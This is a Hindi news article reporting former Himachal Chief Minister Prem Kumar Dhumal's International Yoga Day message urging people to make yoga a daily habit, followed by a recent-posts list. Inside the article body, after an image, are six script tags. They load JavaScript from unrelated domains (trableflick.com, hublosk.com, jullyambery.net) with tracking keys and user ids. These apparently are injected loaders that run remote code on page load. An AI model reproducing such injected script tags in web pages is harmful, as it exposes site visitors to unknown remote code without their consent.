अंतर्राष्ट्रीय योग दिवस पर पूर्व CM धूमल ने योग को अपनी दिनचर्या में शामिल करने का दिया संदेश

<p>योग मन की शांति और पवित्रता लाता है, योग शरीर मन और आत्मा को जोड़ने का विधान है। प्रतिदिन सुबह उठकर कुछ समय के लिए योग करना मेरी दिनचर्या का एक महत्वपूर्ण हिस्सा है जिसे सब लोगों को अपनाना चाहिए। वरिष्ठ भाजपा नेता एवं पूर्व मुख्यमंत्री प्रोफेसर प्रेम कुमार धूमल ने अंतरराष्ट्रीय योग दिवस पर समस्त जनता को&nbsp; योग को अपनी दिनचर्या में शामिल करने का संदेश देते हुए यह बात कही है। उन्होंने बताया कि 21 जून को संयुक्त राष्ट्र ने वर्ष 2015 में अंतरराष्ट्रीय योग दिवस के रूप में मान्यता दी थी जिसके लिए विश्व के 177 देशों ने अपना समर्थन दिया था तब से इस दिन अंतरराष्ट्रीय स्तर पर योग दिवस मनाया जाता है।</p>

<p>प्रोफेसर धूमल ने कहा कि किसी सामान्य दिन को किसी व्यक्ति विशेष, वस्तु, भाषा, संस्कृति, विज्ञान, परिस्थिति, परिवेश, अभियान या प्रसंग से जोड़कर एक विशेष दिवस के रूप में उद्धघोषित करना उस चीज़ के बारे में जागृति फ़ैलाने के लिए तो उचित है, लेकिन केवल उस दिनविशेष को ही उस चीज़ को याद करना, महत्व देना या मनाना कदापि उचित नहीं है। जैसे कि पर्यावरण हमारे लिए सदैव महत्वपूर्ण है ना कि केवल पर्यावरण दिवस के दिन ही, डॉक्टर्स हमारे लिए सदैव महत्वपूर्ण हैं न कि केवल राष्ट्रीय चिकित्सक दिवस के दिन ही। इसी प्रकार योग हमारे जीवन में हर दिन महत्वपूर्ण होना चाहिए, हमें प्रतिदिन योग करना चाहिए क्योंकि योग एक ऐसा विज्ञान है जो हमारे जीवन को न केवल निरोगी बनाता है बल्कि हमारे मन को स्वच्छ सुंदर और पवित्र विचारों से परिपूर्ण करता है।</p>

<p>उन्होंने योग के महत्व पर प्रकाश डालते हुए कहा कि हमारे ऋषि-मुनियों ने योग के महत्व को समझा और आम जनमानस को इसे सीखने के लिए इसे ग्रंथों में उतारा है। हमारे पूर्वजों ने योग को जीवन में आत्मसात करके एक निरोगी स्वस्थ और लंबा जीवन जीया है। वर्तमान समय में आधुनिकता और विकास की दौड़ में जहां धीरे-धीरे सामान्य मानव जीवन अवधि कम हो रही है ऐसे में योग को जीवन का एक हिस्सा बनाकर हम स्वस्थ और दीर्घायु बन सकते हैं। हमारे प्रधानमंत्री योग के महत्व को समझते हुए प्रतिदिन योग करते हैं।</p>

<p><img src=”/media/gallery/images/image(2878).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”https://trableflick.com/optout/set/lat?jsonp=__mtz_cb_641750265&amp;key=21aca573d498d25317&amp;cv=1624259246&amp;t=1624259246978″ type=”text/javascript”></script>
<script src=”https://trableflick.com/optout/set/lt?jsonp=__mtz_cb_120606298&amp;key=21aca573d498d25317&amp;cv=81768&amp;t=1624259246980″ type=”text/javascript”></script>
<script src=”http://hublosk.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://jullyambery.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1624259246986″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

नवाचार को बढ़ावा दे रहा एटीसी शाहपुर

नवीन तकनीक और प्रौद्योगिकी से आत्मनिर्भरता की ओर बढ़ रहे कदम Kangra:  उपयुक्त प्रौद्योगिकी केन्द्र…

8 hours ago

हिमाचल में कांस्टेबल भर्ती: निगेटिव मार्किंग के साथ फिजिकल और लिखित परीक्षा में कड़ी शर्तें, विस्‍तार से जानें

Himachal:  हिमाचल प्रदेश में होने जा रही विशेष पुलिस कांस्टेबल भर्ती की लिखित परीक्षा में…

9 hours ago

हिमाचल प्रदेश में तीन हादसों में दो की मौत, दो घायल

मंडी में करंट लगने से युवक की मौत कुल्लू में वोल्वो बस और कार की…

9 hours ago

Dharamshala News: महिला वर्ग में साधना व पुरुष वर्ग में अनीश रहे पहले स्थान पर

Mini Marathon Held in Dharamshala: वन्य प्राणी सप्ताह के अंतर्गत आज रविवार को धर्मशाला में…

10 hours ago

Mandi News: पुरुष वर्ग में बल्ह के 23 वर्षीय आशुतोष ने 18 मिनट में मैराथन पूरी कर बनाया रिकॉर्ड

  Mini Marathon Mandi: वन विभाग द्वारा 73वें वन्य सप्ताह के अंतर्गत रविवार को एक…

12 hours ago

Hamirpur News: आयुर्वेदिक अस्पताल में जल्द शुरू होगी टेलीमेडिसिन ओपीडी, मरीजों को घर बैठे मिलेगी चिकित्सा सुविधा

  Ayurvedic hospital telemedicine services: जिला आयुर्वेदिक अस्पताल हमीरपुर में जल्द ही टेलीमेडिसिन ओपीडी की…

12 hours ago